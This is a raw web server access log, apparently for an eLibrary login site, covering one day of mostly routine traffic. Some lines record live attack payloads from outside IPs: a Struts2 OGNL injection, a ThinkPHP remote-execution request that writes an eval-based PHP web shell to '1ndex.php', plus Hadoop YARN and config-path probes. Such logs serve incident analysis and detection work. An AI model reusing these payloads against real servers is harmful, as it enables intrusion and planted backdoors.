209.17.97.122 - - [12/Mar/2019:01:17:50 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [12/Mar/2019:01:30:07 -0400] "GET /robots.txt HTTP/1.1" 302 -
127.0.0.1 - - [12/Mar/2019:01:30:08 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [12/Mar/2019:01:30:11 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [12/Mar/2019:01:30:13 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [12/Mar/2019:01:45:19 -0400] "GET / HTTP/1.1" 302 -
209.17.96.210 - - [12/Mar/2019:01:45:42 -0400] "GET / HTTP/1.1" 302 -
23.102.51.95 - - [12/Mar/2019:01:55:08 -0400] "POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1" 200 2137
23.102.51.95 - - [12/Mar/2019:01:55:08 -0400] "POST /index.action HTTP/1.1" 302 -
23.102.51.95 - - [12/Mar/2019:01:55:08 -0400] "POST /index.action HTTP/1.1" 302 -
23.102.51.95 - - [12/Mar/2019:01:55:09 -0400] "POST /index.action HTTP/1.1" 302 -
23.102.51.95 - - [12/Mar/2019:01:55:09 -0400] "POST /index.action HTTP/1.1" 302 -
23.102.51.95 - - [12/Mar/2019:01:55:09 -0400] "POST /index.action HTTP/1.1" 302 -
23.102.51.95 - - [12/Mar/2019:01:55:09 -0400] "POST /index.action HTTP/1.1" 302 -
23.102.51.95 - - [12/Mar/2019:01:55:09 -0400] "POST /index.action HTTP/1.1" 302 -
23.102.51.95 - - [12/Mar/2019:01:55:10 -0400] "POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/login.action HTTP/1.1" 200 2137
23.102.51.95 - - [12/Mar/2019:01:55:10 -0400] "POST /login.action HTTP/1.1" 302 -
23.102.51.95 - - [12/Mar/2019:01:55:10 -0400] "POST /login.action HTTP/1.1" 302 -
23.102.51.95 - - [12/Mar/2019:01:55:10 -0400] "POST /login.action HTTP/1.1" 302 -
23.102.51.95 - - [12/Mar/2019:01:55:10 -0400] "POST /login.action HTTP/1.1" 302 -
23.102.51.95 - - [12/Mar/2019:01:55:11 -0400] "POST /login.action HTTP/1.1" 302 -
23.102.51.95 - - [12/Mar/2019:01:55:11 -0400] "POST /login.action HTTP/1.1" 302 -
23.102.51.95 - - [12/Mar/2019:01:55:11 -0400] "POST /login.action HTTP/1.1" 302 -
209.17.97.90 - - [12/Mar/2019:02:16:25 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [12/Mar/2019:02:22:14 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [12/Mar/2019:02:22:20 -0400] "HEAD /login HTTP/1.1" 200 -
127.0.0.1 - - [12/Mar/2019:02:48:25 -0400] "GET /login HTTP/1.1" 200 4162
209.17.96.234 - - [12/Mar/2019:03:21:15 -0400] "GET / HTTP/1.1" 302 -
209.17.96.234 - - [12/Mar/2019:03:35:43 -0400] "GET / HTTP/1.1" 302 -
209.17.96.26 - - [12/Mar/2019:03:50:25 -0400] "GET / HTTP/1.1" 302 -
209.17.96.210 - - [12/Mar/2019:04:38:21 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [12/Mar/2019:04:41:24 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [12/Mar/2019:04:41:27 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [12/Mar/2019:04:41:36 -0400] "GET /images/elibrary2.png HTTP/1.1" 200 137532
127.0.0.1 - - [12/Mar/2019:04:41:36 -0400] "GET /css/new-style.css HTTP/1.1" 200 5551
127.0.0.1 - - [12/Mar/2019:04:41:37 -0400] "GET /images/eLibrary%20Pro%20Logo%20-%20Powered%20by%203.png HTTP/1.1" 200 213908
127.0.0.1 - - [12/Mar/2019:04:41:43 -0400] "GET /fonts/opensans-regular-webfont.woff2 HTTP/1.1" 404 990
127.0.0.1 - - [12/Mar/2019:04:41:43 -0400] "GET /images/bg.png HTTP/1.1" 200 166566
127.0.0.1 - - [12/Mar/2019:04:41:47 -0400] "GET /fonts/opensans-regular-webfont.woff HTTP/1.1" 404 990
127.0.0.1 - - [12/Mar/2019:04:41:52 -0400] "GET /fonts/opensans-regular-webfont.ttf HTTP/1.1" 404 990
94.177.244.244 - - [12/Mar/2019:05:23:39 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137
127.0.0.1 - - [12/Mar/2019:06:20:11 -0400] "GET /wp-login.php HTTP/1.1" 302 -
127.0.0.1 - - [12/Mar/2019:06:20:11 -0400] "GET /login HTTP/1.1" 200 4162
209.17.96.50 - - [12/Mar/2019:07:28:24 -0400] "GET / HTTP/1.1" 302 -
209.17.97.90 - - [12/Mar/2019:07:29:36 -0400] "GET / HTTP/1.1" 302 -
125.64.94.201 - - [12/Mar/2019:07:31:15 -0400] "GET / HTTP/1.0" 302 -
128.199.42.244 - - [12/Mar/2019:08:06:17 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137
127.0.0.1 - - [12/Mar/2019:08:20:03 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [12/Mar/2019:08:20:03 -0400] "GET /login HTTP/1.1" 200 4162
139.59.131.120 - - [12/Mar/2019:08:30:14 -0400] "GET /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=1ndex.php&vars[1][1]=%3c%3fphp+function+_strint(%24key)%7b+return+strrev(%24key)%3b+%7d+function+log1(%24log)%7b+lone(_strint(strrev(%24log)))%3b+%7d+function+lone(%24key)%7b+%24str+%3d+%22%22%3b+return+eval(%24str.%24key.%24str)%3b+%7d+foreach+(array(%27_COOKIE%27%2c%27_POST%27%2c%27_GET%27)+as+%24_request)+%7b+foreach+(%24%24_request+as+%24_key%3d%3e%24_value)+%7b+%24%24_key%3d+%24_value%3b+%7d+%7d+%24id+%3d+isset(%24jsha)+%3f+%24id+%3a+2%3b+log1(%24jsha)%3b+%3f%3e HTTP/1.1" 302 -
139.59.131.120 - - [12/Mar/2019:08:30:14 -0400] "GET /login HTTP/1.1" 200 4162
139.59.131.120 - - [12/Mar/2019:08:30:15 -0400] "POST /1ndex.php HTTP/1.1" 302 -
139.59.131.120 - - [12/Mar/2019:08:30:15 -0400] "GET /login HTTP/1.1" 200 4162
209.17.96.226 - - [12/Mar/2019:09:16:33 -0400] "GET / HTTP/1.1" 302 -
209.17.96.234 - - [12/Mar/2019:09:21:59 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [12/Mar/2019:09:32:46 -0400] "GET /wp-login.php HTTP/1.1" 302 -
127.0.0.1 - - [12/Mar/2019:09:32:46 -0400] "GET /login HTTP/1.1" 200 4162
5.8.55.40 - - [12/Mar/2019:09:49:29 -0400] "GET /conf HTTP/1.1" 302 -
5.8.55.40 - - [12/Mar/2019:09:49:29 -0400] "GET /login HTTP/1.1" 200 4162
209.17.96.34 - - [12/Mar/2019:10:26:35 -0400] "GET / HTTP/1.1" 302 -
5.8.55.40 - - [12/Mar/2019:11:00:17 -0400] "GET /conf HTTP/1.1" 302 -
5.8.55.40 - - [12/Mar/2019:11:00:17 -0400] "GET /login HTTP/1.1" 200 4162
209.17.97.10 - - [12/Mar/2019:11:51:17 -0400] "GET / HTTP/1.1" 302 -
209.17.97.98 - - [12/Mar/2019:13:13:02 -0400] "GET / HTTP/1.1" 302 -
209.17.96.26 - - [12/Mar/2019:13:24:41 -0400] "GET / HTTP/1.1" 302 -
5.8.55.40 - - [12/Mar/2019:13:46:22 -0400] "GET /conf HTTP/1.1" 302 -
5.8.55.40 - - [12/Mar/2019:13:46:23 -0400] "GET /login HTTP/1.1" 200 4162
5.8.55.40 - - [12/Mar/2019:14:13:19 -0400] "GET /conf HTTP/1.1" 302 -
5.8.55.40 - - [12/Mar/2019:14:13:19 -0400] "GET /login HTTP/1.1" 200 4162
209.17.97.2 - - [12/Mar/2019:14:20:33 -0400] "GET / HTTP/1.1" 302 -
128.199.42.244 - - [12/Mar/2019:15:38:07 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137
127.0.0.1 - - [12/Mar/2019:16:33:42 -0400] "GET /robots.txt HTTP/1.1" 302 -
127.0.0.1 - - [12/Mar/2019:16:33:42 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [12/Mar/2019:16:33:44 -0400] "GET / HTTP/1.1" 302 -
128.199.42.244 - - [12/Mar/2019:16:42:55 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137
209.17.96.234 - - [12/Mar/2019:16:46:53 -0400] "GET / HTTP/1.1" 302 -
5.8.55.40 - - [12/Mar/2019:16:48:48 -0400] "GET /conf HTTP/1.1" 302 -
5.8.55.40 - - [12/Mar/2019:16:48:48 -0400] "GET /login HTTP/1.1" 200 4162
5.8.55.40 - - [12/Mar/2019:17:37:29 -0400] "GET /conf HTTP/1.1" 302 -
5.8.55.40 - - [12/Mar/2019:17:37:29 -0400] "GET /login HTTP/1.1" 200 4162
27.115.124.6 - - [12/Mar/2019:18:23:24 -0400] "GET /server-status HTTP/1.1" 302 -
27.115.124.6 - - [12/Mar/2019:18:23:25 -0400] "GET /login HTTP/1.1" 200 4162
209.17.96.26 - - [12/Mar/2019:18:41:18 -0400] "GET / HTTP/1.1" 302 -
209.17.97.122 - - [12/Mar/2019:20:03:49 -0400] "GET / HTTP/1.1" 302 -
5.8.55.40 - - [12/Mar/2019:20:04:46 -0400] "GET /conf HTTP/1.1" 302 -
5.8.55.40 - - [12/Mar/2019:20:04:46 -0400] "GET /login HTTP/1.1" 200 4162
5.8.55.40 - - [12/Mar/2019:20:32:34 -0400] "GET /conf HTTP/1.1" 302 -
5.8.55.40 - - [12/Mar/2019:20:32:35 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [12/Mar/2019:20:46:44 -0400] "GET / HTTP/1.1" 302 -
209.17.96.66 - - [12/Mar/2019:20:49:22 -0400] "GET / HTTP/1.1" 302 -
209.17.97.58 - - [12/Mar/2019:21:25:31 -0400] "GET / HTTP/1.1" 302 -
209.17.97.26 - - [12/Mar/2019:22:29:21 -0400] "GET / HTTP/1.1" 302 -
128.199.42.244 - - [12/Mar/2019:23:00:28 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137
209.17.97.114 - - [12/Mar/2019:23:02:18 -0400] "GET / HTTP/1.1" 302 -
209.17.96.34 - - [12/Mar/2019:23:07:47 -0400] "GET / HTTP/1.1" 302 -
5.8.55.40 - - [12/Mar/2019:23:11:02 -0400] "GET /conf HTTP/1.1" 302 -
5.8.55.40 - - [12/Mar/2019:23:11:02 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [12/Mar/2019:23:37:41 -0400] "GET /login HTTP/1.1" 200 4162